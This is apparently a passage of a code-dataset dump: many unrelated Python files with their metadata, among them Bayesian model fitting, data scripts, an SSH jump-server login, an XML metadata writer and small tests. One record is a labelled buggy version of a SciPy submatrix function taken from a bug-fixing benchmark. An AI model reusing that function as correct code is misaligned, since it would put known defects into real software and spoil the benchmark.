psi_df.reset_index(inplace=True, drop=True)\n brca2_psi = psi_df['brca2_9nt'].values/100.\n ikbkap_psi = psi_df['ikbkap_9nt'].values/100.\n\n return jnp.log(brca2_psi), jnp.log(ikbkap_psi)\n\n\ndef backg_noise_model(x_psi, y_psi):\n\n x_kernel = stats.gaussian_kde(x_psi)\n opt = optimize.minimize_scalar(lambda x: -x_kernel(x))\n Nx = float(opt.x[0])\n\n y_kernel = stats.gaussian_kde(y_psi)\n opt = optimize.minimize_scalar(lambda x: -y_kernel(x))\n Ny = float(opt.x[0])\n return Nx, Ny\n\n\ndef allelic_manifold(alpha, c, Nx, Ny, w):\n num = w**2+(alpha+1)*w\n denum = num+alpha\n x = num/denum + Nx\n num = (c*w)**2+(c*w)*(alpha+1)\n denum = num+alpha\n y = num/denum + Ny\n return np.log(x), np.log(y)\n\n\ndef model(len_ss, Nx, Ny, obs=None):\n log_alpha = numpyro.sample('log_alpha', dist.Normal())\n log_c = numpyro.sample('log_c', dist.Normal())\n log_w_mean = numpyro.sample('log_w_mean', dist.Normal())\n log_w_sigma = numpyro.sample('log_w_sigma', dist.Gamma(concentration=1,\n rate=1))\n log_w_raw = numpyro.sample(\n 'log_w_raw', dist.Normal(loc=jnp.zeros((len_ss,))))\n alpha = numpyro.deterministic('alpha', jnp.exp(log_alpha))\n\n c = numpyro.deterministic('c', jnp.exp(log_c))\n w = numpyro.deterministic('w', jnp.exp(\n log_w_mean + log_w_sigma * log_w_raw))\n\n num = w**2+(alpha+1)*w\n denum = num+alpha\n mu_x = jnp.log(num/denum + Nx)\n\n num = (c*w)**2+(c*w)*(alpha+1)\n denum = num+alpha\n mu_y = jnp.log(num/denum + Ny)\n\n sigma = numpyro.sample('sigma', dist.Normal(loc=0, scale=0.5))\n numpyro.sample('obs',\n dist.Normal(loc=jnp.stack([mu_x, mu_y], -1), scale=sigma),\n obs=obs)\n\n\ndef main(args):\n rng_jax = random.PRNGKey(0)\n\n # Get data\n x, y = get_mpsa_brca2_ikbkap_data()\n Nx, Ny = backg_noise_model(jnp.exp(x), jnp.exp(y))\n\n kernel = NUTS(model, target_accept_prob=0.99)\n mcmc = MCMC(kernel, num_warmup=args.num_warmup,\n num_samples=args.num_samples,\n num_chains=args.num_chains)\n mcmc.run(rng_jax,\n len_ss=x.shape[0],\n Nx=Nx,\n Ny=Ny,\n obs=jnp.c_[x, y])\n # Convert the inference data to arviz for plotting and load later.\n posterior_samples = mcmc.get_samples()\n posterior_predictive = Predictive(model, posterior_samples)(random.PRNGKey(1),\n Nx=Nx,\n Ny=Ny,\n len_ss=x.shape[0])\n prior = Predictive(model, num_samples=500)(\n random.PRNGKey(10), Nx=Nx, Ny=Ny, len_ss=x.shape[0])\n az_data = az.from_numpyro(\n mcmc, prior=prior, posterior_predictive=posterior_predictive)\n # Saving inference data to the netcfd format\n az.plot_trace(az_data, var_names=['log_alpha', 'alpha'])\n plt.show()\n # az_data.to_netcdf(\n # f'res_N{args.num_samples}_C{args.num_chains}_W{args.num_warmup}_fixed_noise.nc')\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"Bayesian inference for one step delay model\")\n parser.add_argument(\"-n\",\n \"--num_samples\",\n nargs=\"?\",\n default=200,\n type=int)\n parser.add_argument(\"-w\", \"--num_warmup\", nargs=\"?\",\n default=1000, type=int)\n parser.add_argument(\"-c\", \"--num_chains\", nargs=\"?\",\n default=4, type=int)\n parser.add_argument(\"--device\",\n default=\"cpu\",\n type=str,\n help='use \"cpu\" or \"gpu\".')\n args = parser.parse_args()\n\n numpyro.set_platform(args.device)\n numpyro.set_host_device_count(args.num_chains)\n\n main(args)\n","sub_path":"numpyro_src/inference_one_step_fixed_noise.py","file_name":"inference_one_step_fixed_noise.py","file_ext":"py","file_size_in_byte":4662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"53885826","text":"import torch\nfrom cyy_torch_toolbox.data_structure.torch_process_task_queue import \\\n TorchProcessTaskQueue\n\n\ndef hello(tasks, **kwargs):\n assert tasks == [()]\n return {\"1\": torch.Tensor([1, 2, 3])}\n\n\ndef test_process_task_queue():\n queue = TorchProcessTaskQueue(\n hello, send_tensor_in_cpu=True, assemble_tensor=True, batch_process=True\n )\n queue.start()\n queue.add_task(())\n res = queue.get_data()\n assert len(res) == 1\n assert \"1\" in res\n assert res[\"1\"].tolist() == [1, 2, 3]\n queue.stop()\n","sub_path":"cyy_torch_toolbox/test/data_structure/test_torch_process_task_queue.py","file_name":"test_torch_process_task_queue.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"443023110","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nfrom logger import setup_custom_logger\nfrom file_writer import file_writer\nimport sys\nimport pandas as pd\nimport cbsodata\nfrom msg import *\n\n\nlogger = setup_custom_logger(\"B009_New_Building_Permits\")\nlogger.info(\"---------------------------------------------------\")\nlogger.info(txtStarting + \" \" + logger.name)\n\ndataset_id = \"83671NED\"\nlogger.info(f\"Retrieve data from dataset {dataset_id}\")\ntry:\n df = pd.DataFrame(\n cbsodata.get_data(\n \"83671NED\",\n filters=\"Perioden gt '2012' and Opdrachtgever ne 'T001209' and Eigendom ne'T001258'\",\n select=[\n \"RegioS\",\n \"Perioden\",\n \"Opdrachtgever\",\n \"Eigendom\",\n \"Woningen_2\",\n \"Wooneenheden_3\",\n \"Recreatiewoningen_4\",\n ],\n )\n )\nexcept:\n logger.exception(\"API incorrectly loaded\")\n raise\n\n\ntry:\n df = df.groupby([\"Perioden\", \"Opdrachtgever\", \"Eigendom\"]).agg(\n {\"Woningen_2\": [\"sum\"], \"Wooneenheden_3\": sum, \"Recreatiewoningen_4\": sum}\n )\n df = df.reset_index()\nexcept:\n logger.exception(\"Grouping data failed\")\n raise\n\n\n# Date formatting and quarter format\ntry:\n df[\"Perioden\"] = df[\"Perioden\"].str.replace(\" 1e kwartaal\", \"-03-01\")\n df[\"Perioden\"] = df[\"Perioden\"].str.replace(\" 2e kwartaal\", \"-06-01\")\n df[\"Perioden\"] = df[\"Perioden\"].str.replace(\" 3e kwartaal\", \"-09-01\")\n df[\"Perioden\"] = df[\"Perioden\"].str.replace(\" 4e kwartaal\", \"-12-01\")\n df[\"Perioden\"] = pd.to_datetime(df[\"Perioden\"]).dt.date\nexcept:\n logger.exception(\n \"Columns could not be changed to monthly numbers or formatted to different date\"\n )\n raise\n\n\ntry:\n file_writer(df, \"B009_New_Building_Permits\")\n logger.info(txtDone)\nexcept:\n logger.exception(\"Exporting failed\")\n raise\n","sub_path":"sse-aai-zsa/Zsa/scripts/B009_New_Building_Permits.py","file_name":"B009_New_Building_Permits.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"313895183","text":"import tarfile\nimport random\n\n\ndef thawing():\n # 解凍\n with tarfile.open(\"rt-polaritydata.tar.gz\", \"r:*\") as tar:\n tar.extractall()\n tar = list(tar)\n negfile = tar[1].name\n posfile = tar[2].name\n return negfile, posfile\n\n\ndef input_neg_pos(negfile, posfile):\n # ファイル読み込み\n with open(negfile, \"r\", encoding=\"cp1252\") as negf,\\\n open(posfile, \"r\", encoding=\"cp1252\") as posf:\n neg_lines = negf.readlines()\n pos_lines = posf.readlines()\n\n return neg_lines, pos_lines\n\n\ndef count_neg_pos(filepath: str):\n with open(filepath, \"r\", encoding=\"cp1252\") as inf:\n lines = inf.readlines()\n pos_count = 0\n neg_count = 0\n for l in lines:\n if \"+1\" in l:\n pos_count += 1\n elif \"-1\" in l:\n neg_count += 1\n print(\"pos: {0}, neg: {1}\".format(pos_count, neg_count))\n\n\nif __name__ == \"__main__\":\n negfile, posfile = thawing()\n neg_lines, pos_lines = input_neg_pos(negfile, posfile)\n\n new_pos_lines = [\"+1 \" + line for line in pos_lines]\n new_neg_lines = [\"-1 \" + line for line in neg_lines]\n new_lines = new_pos_lines + new_neg_lines\n random.shuffle(new_lines)\n filepath = \"sentiment.txt\"\n with open(filepath, \"w\", encoding=\"cp1252\") as outf:\n outf.writelines(new_lines)\n\n count_neg_pos(filepath)\n","sub_path":"matsubara/Chap8/knock70.py","file_name":"knock70.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"565533121","text":"from datetime import datetime\n\n\ndef getStats(chatData):\n stats = {}\n stats[\"count\"] = len(chatData[\"messages\"])\n stats[\"daycounts\"] = getDayCounts(chatData[\"messages\"])\n return stats\n\n\ndef getDayCounts(messages):\n daycounts = {\n \"Sunday\": 0,\n \"Monday\": 0,\n \"Tuesday\": 0,\n \"Wednesday\": 0,\n \"Thursday\": 0,\n \"Friday\": 0,\n \"Saturday\": 0\n }\n\n for message in messages:\n daycounts[getDay(message[\"timestamp_ms\"])] += 1\n\n return daycounts\n\n\ndef getDay(ep_time):\n # consider converting all timestamp_ms to this format, then extract desired information at each step once\n return datetime.fromtimestamp(ep_time/1000).strftime(\"%A\")\n","sub_path":"Analysis/chatStats.py","file_name":"chatStats.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"358483478","text":"# _*_coding:utf-8_*_\n# __author__ = 'Alex Li'\nimport sys\nimport traceback\nimport time\nfrom core.redis_handler import Redis_Handler\nimport paramiko\n\ntry:\n import interactive\nexcept ImportError:\n from . import interactive\n\n\ndef ssh_login(user_obj, bind_host_obj):\n # now, connect and use paramiko Client to negotiate SSH2 across the connection\n try:\n client = paramiko.SSHClient()\n client.load_system_host_keys()\n client.set_missing_host_key_policy(paramiko.WarningPolicy())\n print('*** Connecting...')\n # client.connect(hostname, port, username, password)\n client.connect(bind_host_obj.host.ip_addr,\n bind_host_obj.host.port,\n bind_host_obj.remoteuser.username,\n bind_host_obj.remoteuser.password,\n timeout=30)\n chan = client.invoke_shell()\n print(repr(client.get_transport()))\n print('*** Here we go!\\n')\n log = dict(user_id=user_obj.id,\n bind_host_id=bind_host_obj.id,\n action_type='login',\n cmd=\"\",\n date=time.time())\n Redis_Handler.push(log)\n interactive.interactive_shell(chan, user_obj, bind_host_obj)\n chan.close()\n client.close()\n except Exception as e:\n print('*** Caught exception: %s: %s' % (e.__class__, e))\n traceback.print_exc()\n try:\n client.close()\n except:\n pass\n sys.exit(1)\n","sub_path":"14、练习的项目/15_堡垒机/my_jump_server/core/ssh_login.py","file_name":"ssh_login.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"619532995","text":"def _get_submatrix(self, slice0, slice1):\n 'Return a submatrix of this matrix (new matrix is created).'\n (slice0, slice1) = self._swap((slice0, slice1))\n (shape0, shape1) = self._swap(self.shape)\n\n def _process_slice(sl, num):\n if isinstance(sl, slice):\n (i0, i1) = (sl.start, sl.stop)\n if (i0 is None):\n i0 = 0\n elif (i0 < 0):\n i0 = (num + i0)\n if (i1 is None):\n i1 = num\n elif (i1 < 0):\n i1 = (num + i1)\n return (i0, i1)\n elif np.isscalar(sl):\n if (sl < 0):\n sl += num\n return (sl, (sl + 1))\n else:\n return (sl[0], sl[1])\n\n def _in_bounds(i0, i1, num):\n if ((not (0 <= i0 < num)) or (not (0 < i1 <= num)) or (not (i0 < i1))):\n raise IndexError(('index out of bounds: 0<=%d<%d, 0<=%d<%d, %d<%d' % (i0, num, i1, num, i0, i1)))\n (i0, i1) = _process_slice(slice0, shape0)\n (j0, j1) = _process_slice(slice1, shape1)\n _in_bounds(i0, i1, shape0)\n _in_bounds(j0, j1, shape1)\n aux = _sparsetools.get_csr_submatrix(shape0, shape1, self.indptr, self.indices, self.data, i0, i1, j0, j1)\n (data, indices, indptr) = (aux[2], aux[1], aux[0])\n shape = self._swap(((i1 - i0), (j1 - j0)))\n return self.__class__((data, indices, indptr), shape=shape)","sub_path":"Data Set/bug-fixing-4/2cb1c7474547dcb6dfa0bd32d335d5d34cf3e86a-<_get_submatrix>-bug.py","file_name":"2cb1c7474547dcb6dfa0bd32d335d5d34cf3e86a-<_get_submatrix>-bug.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"435695867","text":"#!/usr/bin/env python\n\n'''\nThis module contains a minimal metadata writer class for quickly making\nmetadata\n\n'''\n\n\nimport xml.etree.ElementTree as ET\nimport os\n\nsub = ET.SubElement\n\n\nclass MetaWriter:\n '''\n Writes a metadata file based on the given filename and user input\n \n '''\n\n def __init__(self, datapath):\n '''\n Class takes in a datafile path name and creates an xml tree using the\n column heading of the recarray generated from the csv file.\n\n Parameters\n ----------\n datapath : string\n Datafile name\n\n '''\n assert datapath[-4:] == '.csv', \"%s must end in .csv\" % (datapath)\n self.filename = datapath.split('.')[0]\n fin = open(datapath, 'r')\n self.column_names = fin.readline().strip().split(',')\n fin.close()\n self.root = ET.Element('eml:eml')\n self.root.attrib = {'packageId' : self.filename, 'system' : 'knb',\n \"xmlns:eml\" : \"eml://ecoinformatics.org/eml-2.1.0\", 'xmlns:xsi': \n \"http://www.w3.org/2001/XMLSchema-instance\", \"xsi:schemaLocation\"\n : \"eml://ecoinformatics.org/eml-2.1.0 eml.xsd\"}\n self.dataset = sub(self.root, 'dataset')\n self.title = sub(self.dataset, 'title')\n self.title.text = \"Data set \" + os.path.split(datapath)[1]\n\n self.creator = sub(self.dataset, 'creator')\n self.individualName = sub(self.creator, 'individualName')\n self.surName = sub(self.individualName, 'surName')\n self.surName.text = \"None\"\n\n self.contact = sub(self.dataset, 'contact')\n self.individualName2 = sub(self.contact, 'individualName')\n self.surName2 = sub(self.individualName2, 'surName')\n self.surName2.text = \"None\"\n\n self.dataTable = sub(self.dataset, 'dataTable')\n\n self.entityName = sub(self.dataTable, 'entityName')\n self.entityName.text = os.path.split(datapath)[1]\n\n self.physical = sub(self.dataTable, 'physical')\n self.objectName = sub(self.physical, 'objectName')\n self.objectName.text = os.path.split(datapath)[1]\n self.size = sub(self.physical, 'size')\n self.size.attrib = {'unit' : \"byte\"}\n self.size.text = str(os.path.getsize(datapath))\n \n # Nested in physical\n self.dataFormat = sub(self.physical, 'dataFormat')\n self.textFormat = sub(self.dataFormat, 'textFormat')\n self.numHeaderLines = sub(self.textFormat, 'numHeaderLines')\n self.numHeaderLines.text = \"1\"\n self.recordDelimiter = sub(self.textFormat, 'recordDelimiter')\n self.recordDelimiter.text = \"#x0A\"\n self.attributeOrientation = sub(self.textFormat, 'attributeOrientation')\n self.attributeOrientation.text = \"column\"\n self.simpleDelimited = sub(self.textFormat, 'simpleDelimited')\n self.fieldDelimiter = sub(self.simpleDelimited, 'fieldDelimiter')\n self.fieldDelimiter.text = \",\"\n \n self.distribution = sub(self.physical, 'distribution')\n self.online = sub(self.distribution, 'online')\n self.url = sub(self.online, 'url')\n self.url.text = \"macroeco://\" + os.path.split(datapath)[1]\n \n\n self.attributeList = sub(self.dataTable, 'attributeList')\n self.attributes = []\n self.attributeTypes = []\n for i, name in enumerate(self.column_names):\n attribute = sub(self.attributeList, 'attribute')\n attributeName = sub(attribute, 'attributeName')\n attributeDefinition = sub(attribute, 'attributeDefinition')\n attributeDefinition.text = \"None\"\n measurementScale = sub(attribute, 'measurementScale')\n\n # Default Ordinal\n attributeType = sub(measurementScale, 'ordinal')\n nonNumericDomain = sub(attributeType,'nonNumericDomain')\n textDomain = sub(nonNumericDomain, 'textDomain')\n definition = sub(textDomain, 'definition')\n definition.text = \"None\"\n\n attributeName.text = name\n self.attributes.append(attribute)\n self.attributeTypes.append(attributeType)\n\n self.numberOfRecords = sub(self.dataTable, 'numberOfRecords')\n self.numberOfRecords.text = \"Unknown\"\n\n def add_attribute_types(self, typelist):\n '''\n Sets the type of the attribute to either ordinal (categorical) or\n interval (categorical). Initialized in constructor as ordinal. \n\n Parameters\n ----------\n typelist : list\n A list of tuples. Each tuple contains 2 elements: a string and a\n dict. The dict must contain the keyword cat (categorical) or a \n KeyError will be thrown.\n\n Example of typelist:\n\n [('x', {'cat' : True}), ('y' : {'cat' : True}), ('year',\n {'cat' : False}]\n\n '''\n\n for item in typelist:\n for attribute in self.attributes:\n tree = ET.ElementTree(attribute)\n att = tree.findall('attributeName')[0]\n if (att.text == item[0]):\n measure = tree.findall('measurementScale')[0]\n if item[1]['cat'] == True:\n if len(measure.findall('interval')) == 1:\n measure.remove(measure.find('interval'))\n att_type = sub(measure, 'ordinal')\n nonNumericDomain = sub(att_type,'nonNumericDomain')\n textDomain = sub(nonNumericDomain, 'textDomain')\n definition = sub(textDomain, 'definition')\n definition.text = \"None\"\n\n elif len(measure.findall('ordinal')) == 1:\n measure.remove(measure.find('ordinal'))\n att_type = sub(measure, 'ordinal')\n nonNumericDomain = sub(att_type,'nonNumericDomain')\n textDomain = sub(nonNumericDomain, 'textDomain')\n definition = sub(textDomain, 'definition')\n definition.text = \"None\"\n\n elif item[1]['cat'] == False:\n\n if len(measure.findall('ordinal')) == 1:\n measure.remove(measure.find('ordinal'))\n att_type = sub(measure, 'interval')\n unit = sub(att_type, 'unit')\n standardUnit = sub(unit, 'standardUnit')\n standardUnit.text = \"dimensionless\"\n precision = sub(att_type, 'precision')\n precision.text = \"0\"\n numericDomain = sub(att_type, 'numericDomain')\n numberType = sub(numericDomain, 'numberType')\n numberType.text = 'natural'\n\n\n elif len(measure.findall('interval')) == 1:\n measure.remove(measure.find('interval'))\n att_type = sub(measure, 'interval')\n unit = sub(att_type, 'unit')\n standardUnit = sub(unit, 'standardUnit')\n standardUnit.text = \"dimensionless\"\n precision = sub(att_type, 'precision')\n precision.text = \"0\"\n numericDomain = sub(att_type, 'numericDomain')\n numberType = sub(numericDomain, 'numberType')\n numberType.text = 'natural'\n\n def add_attribute_traits(self, traitlist):\n '''\n Adds traits to the attributes contained in self.attributes as specified\n by the traitlist. Traitlist is a list of tuples with each tuple\n containting two elements: the attribute name (string) and a dictionary\n of traits to be added to the attribute. If the type of the trait\n ordinal, nothing will be changed. Only traits with type interval will\n be appened too. \n \n Parameters\n ----------\n traitlist : list\n A list of 2 element tuples where the first element contains a\n string and the second element conatins a dict. See example in\n docstring. The only keywords that are recognized are maximum,\n minimum, and precision.\n\n Example of traitlist:\n\n [('x', {'minimum' : '0', 'maximum' : '100'}), ('y', {'precision' :\n '0.1'})]\n \n '''\n\n for item in traitlist:\n for attribute in self.attributes:\n tree = ET.ElementTree(attribute)\n child = tree.findall('attributeName')[0]\n if child.text == item[0]:\n #TODO:Cleaner way to do this than with if?\n measure = tree.findall('measurementScale')[0]\n if len(measure.findall('interval')) == 1:\n interval = measure.findall('interval')[0]\n for key in item[1].iterkeys():\n if key == 'precision':\n prec = interval.findall('precision')\n if len(prec) == 0:\n precision = sub(interval, 'precision')\n precision.text = str(item[1][key])\n elif len(prec) == 1:\n prec[0].text = str(item[1][key])\n elif key == 'minimum':\n numericDomain =\\\n interval.findall('numericDomain')[0]\n bnd = numericDomain.findall('bounds')\n if len(bnd) == 0:\n bounds = sub(numericDomain, 'bounds')\n minimum = sub(bounds, 'minimum')\n minimum.attrib = {'exclusive' :\n 'false'}\n minimum.text = str(item[1][key])\n elif len(bnd) == 1:\n mins = bnd[0].findall('minimum')\n if len(mins) == 0:\n minimum = sub(bnd[0], 'minimum')\n minimum = sub(bnd[0], 'minimum')\n minimum.attrib = {'exclusive' :\n 'false'}\n minimum.text = str(item[1][key])\n elif len(mins) == 1:\n bnd[0].remove(mins[0])\n minimum = sub(bnd[0], 'minimum')\n minimum.attrib = {'exclusive' :\n 'false'}\n minimum.text = str(item[1][key])\n elif key == 'maximum':\n numericDomain =\\\n interval.findall('numericDomain')[0]\n bnd = numericDomain.findall('bounds')\n if len(bnd) == 0:\n bounds = sub(numericDomain, 'bounds')\n maximum = sub(bounds, 'maximum')\n maximum.attrib = {'exclusive' :\n 'false'}\n maximum.text = str(item[1][key])\n elif len(bnd) == 1:\n maxs = bnd[0].findall('maximum')\n if len(maxs) == 0:\n maximum = sub(bnd[0], 'maximum')\n maximum.attrib = {'exclusive' :\n 'false'}\n maximum.text = str(item[1][key])\n elif len(maxs) == 1:\n bnd[0].remove(maxs[0])\n maximum = sub(bnd[0], 'maximum')\n maximum.attrib = {'exclusive' :\n 'false'}\n maximum.text = str(item[1][key])\n\n\n\n def write_meta_data(self, name=None):\n '''\n Writes out the xml tree that is contained in self.root and saves and\n .xml file in the currect working directory under the given filename. If\n no name is given save the xml as the same name as the input file.\n\n \n '''\n \n tree = ET.ElementTree(self.root)\n if name == None:\n tree.write(self.filename + '.xml')\n else:\n tree.write(name + '.xml')\n\n \n\n\n\n\n\n\n","sub_path":"utils/metadata_writer.py","file_name":"metadata_writer.py","file_ext":"py","file_size_in_byte":13211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"28554699","text":"try:\n\n link = \"http://suninjuly.github.io/registration2.html\"\n browser = webdriver.Chrome()\n browser.get(link)\n textarea = browser.find_element_by_css_selector('input:required.form-control.first')\n textarea.send_keys(\"mikhail\")\n textarea = browser.find_element_by_css_selector('input:required.form-control.second')\n textarea.send_keys(\"input.form-control.second\")\n textarea = browser.find_element_by_css_selector('input:required.form-control.third')\n textarea.send_keys(\"blablab333@mail.ru\")\n textarea = browser.find_element_by_xpath('/html/body/div[1]/form/div[2]/div[1]/input')\n textarea.send_keys(\"bwebe\")\n textarea = browser.find_element_by_xpath('/html/body/div[1]/form/div[2]/div[2]/input')\n textarea.send_keys(\"123\")\n time.sleep(3)\n button = browser.find_element_by_css_selector(\"button.btn\")\n button.click()\n # находим элемент, содержащий текст\n welcome_text_elt = browser.find_element_by_tag_name(\"h1\")\n # записываем в переменную welcome_text текст из элемента welcome_text_elt\n welcome_text = welcome_text_elt.text\n # с помощью assert проверяем, что ожидаемый текст совпадает с текстом на странице сайта\n assert \"Congratulations! You have successfully registered!\" == welcome_text\n\nfinally:\n time.sleep(5)\n browser.quit()","sub_path":"Module-1.searchRequiredInput.py","file_name":"Module-1.searchRequiredInput.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"358192783","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 27 14:30:26 2017\n\n@author: ansty\n\"\"\"\n\n\nimport math\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport pylab as P\n\n\nimport warnings\nwarnings.filterwarnings('ignore')\nimport mpl_toolkits\nmpl_toolkits.__path__.append('/usr/lib/python2.7/dist-packages/mpl_toolkits/')\nfrom mpl_toolkits.basemap import Basemap\n\n\nimport folium\n\ndef generate_folium(df):\n \n my_map = folium.Map(location=[55.88207495748612, 10.636574309440173], zoom_start=6)\n for coords in zip(df.lon.values, \n df.lat.values):\n folium.CircleMarker(location=[coords[1], coords[0]], radius=2).add_to(my_map)\n my_map.save('data/sales_locations_1992.html')\n \n \ndef generate_basemap(df):\n \n fig = plt.figure(figsize=(8, 8))\n m = Basemap(projection='lcc', resolution=None,\n width=5000000, height=5000000, \n lat_0=55, lon_0=10,)\n \n for index,coord in df.iterrows():\n #print(coord['lat'])\n x, y = m(coord['lon'],coord['lat'])\n plt.plot(x, y, 'ok', markersize=5)\n plt.savefig('./data/50km_range_norreport.png')\n\ndef generate_2d_plot(df):\n fig = df.plot(x='distance', y='price_per_sq_m')\n plt.savefig('./data/price_per_sq_m_plot.png')\n plt.show()\n\ndef generate_histogram(df,column):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n list_plot = df[column].tolist()\n numBins = 150\n ax.hist(list_plot,numBins,color='green',alpha=0.9)\n plt.show()\n plt.savefig('./data/histogram')\n \ndef generate_histogram_cumulatve(df,column,frequency):\n \n list_all = df[column,frequency]\n list\n test = list_all.tolist()\n print(test)\n numBins = 150\n #P.figure()\n #P.hist(list_all.tolist(), numBins, histtype='step', stacked=True, fill=True)\n #P.show()\n \ndef generate_histogram_cumulatve_dataframe(df,column,frequency):\n \n df_2 = df[[column, frequency]]\n df_3 = df_2.groupby([column,frequency]).size().reset_index(name='counts')\n df_3.pivot_table(index='zip_code', columns='no_rooms', values='counts', aggfunc='sum').plot(rot=0, stacked=True)\n plt.savefig('./data/histogram_cumulatve')\n \ndef generate_histogram_3d(df,column,frequency):\n \n df_2 = df[[column, frequency]]\n df_3 = df_2.groupby([column,frequency]).size().reset_index(name='counts')\n #df_3.pivot_table(index='zip_code', columns='no_rooms', values='counts', aggfunc='sum').plot(rot=0, stacked=True)\n #plt.savefig('./data/histogram_cumulatve')\n \ndef generate_scatter_plot_from_dataframe(df):\n cols = ['lon', 'lat']\n df[cols].plot(kind='scatter', \n x='lon',\n y='lat')\n \ndef generate_scatter_plot_from_dataframe_distances(df):\n lat = df['lat'].tolist()\n lon = df['lon'].tolist()\n distances = df['distance'] \n return plt.scatter(lon,lat,c=distances)\n \n\ndef save_plot(plot,filename):\n plot.get_figure().savefig(filename)\n\ndef generate_scatter_plot_distances(lat,long,distances,filename):\n return plt.scatter(longs,lats,c=distances)\n \ndef get_haversine_distances_from_pos(df,pos,maxkm):\n for i, row in df.iterrows():\n \n distance = haversine_distance(pos, row)\n\ndef get_haversine_distances_from_pos(df,pos,maxkm):\n lat = df['lat'].tolist()\n lon = df['lon'].tolist()\n latlon_list = zip(lat,lon)\n pos_within_maxkm = []\n for row in latlon_list:\n distance = haversine_distance(pos, row)\n if maxkm is not None:\n if distance < maxkm: \n pos_within_maxkm.append(zip(row,distance))\n else:\n pos_within_maxkm.append(zip(row,distance))\n return pos_within_maxkm\n\ndef get_datafraeme_with_haversine_distances_from_pos(df,pos,maxkm):\n lat = df['lat'].tolist()\n lon = df['lon'].tolist()\n latlon_list = zip(lat,lon)\n haversine_distances = []\n lat_list = []\n lon_list = []\n for row in latlon_list:\n distance = haversine_distance(pos, row)\n if maxkm is not None:\n if distance < maxkm:\n lat_list.append(row[0])\n lon_list.append(row[1])\n haversine_distances.append(distance)\n else:\n lat_list.append(row[0])\n lon_list.append(row[1])\n haversine_distances.append(distance)\n posdf = pd.DataFrame(list(zip(lat_list, lon_list, haversine_distances)),columns=['lat','lon','distance'])\n return posdf\n\n\ndef haversine_distance(origin, destination):\n\n lat_orig, lon_orig = origin\n lat_dest, lon_dest = destination\n radius = 6371\n\n dlat = math.radians(lat_dest-lat_orig)\n dlon = math.radians(lon_dest-lon_orig)\n a = (math.sin(dlat / 2) * math.sin(dlat / 2) + math.cos(math.radians(lat_orig)) \n * math.cos(math.radians(lat_dest)) * math.sin(dlon / 2) * math.sin(dlon / 2))\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n d = radius * c\n\n return d\n","sub_path":"assignment_4/plot_handler.py","file_name":"plot_handler.py","file_ext":"py","file_size_in_byte":4885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"408784378","text":"def bolha(lista: []):\n tl = len(lista) - 1\n\n while tl > 0:\n for i in range(tl):\n if len(lista[i+1]) > len(lista[i]):\n aux = lista[i]\n lista[i] = lista[i+1]\n lista[i+1] = aux\n tl -= 1\n\nn = int(input())\nwhile n > 0:\n words = input().rsplit(' ')\n\n bolha(words)\n\n tl = len(words)\n for i in range(tl-1):\n print(words[i], end=' ')\n\n print(words[-1])\n\n n -= 1\n","sub_path":"uri/1244.py","file_name":"1244.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"616960237","text":"# -*- coding: UTF-8 -*-\n\"\"\"\ntitle: 只出现一次的数字\nGiven a non-empty array of integers nums, every element appears twice except for one. Find that single one.\nYou must implement a solution with a linear runtime complexity and use only constant extra space.\n\n\nExample 1:\nInput: nums = [2,2,1]\nOutput: 1\n\nExample 2:\nInput: nums = [4,1,2,1,2]\nOutput: 4\n\nExample 3:\nInput: nums = [1]\nOutput: 1\n\n\nConstraints:\n1 <= nums.length <= 3 * 10^4\n-3 * 10^4 <= nums[i] <= 3 * 10^4\nEach element in the array appears twice except for one element which appears only once.\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def singleNumber(self, nums: List[int]) -> int:\n \"\"\"位运算。两个相同数字做异或,结果为0,0和任何数字做异或,都为该数字本身\"\"\"\n res = 0\n for num in nums:\n res ^= num\n return res\n\n\nif __name__ == '__main__':\n print(Solution().singleNumber([4, 1, 2, 1, 2]))\n","sub_path":"All_Solutions/a136_single-number.py","file_name":"a136_single-number.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"273696521","text":"#Lab 2\n#Nabeel Khan\n#Nabeel.khan24@myhunter.cuny.edu\n#February 7, 2020\n#This program draws a decagon\n\nimport turtle\n\nmeep = turtle.Turtle()\nfor i in range(10):\n meep.forward(100)\n meep.left(36)","sub_path":"Lab 2.py","file_name":"Lab 2.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"217929563","text":"from django.shortcuts import render\nfrom django.views.generic.detail import DetailView\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom gallery.models import Gallery,Photo\n\n\nclass GalleryDetailView(DetailView):\n model = Gallery\n template_name = \"gallery_detail.html\"\n\n def get(self, request, **kwargs):\n self.object = self.get_object()\n uid = self.object.uid\n language = 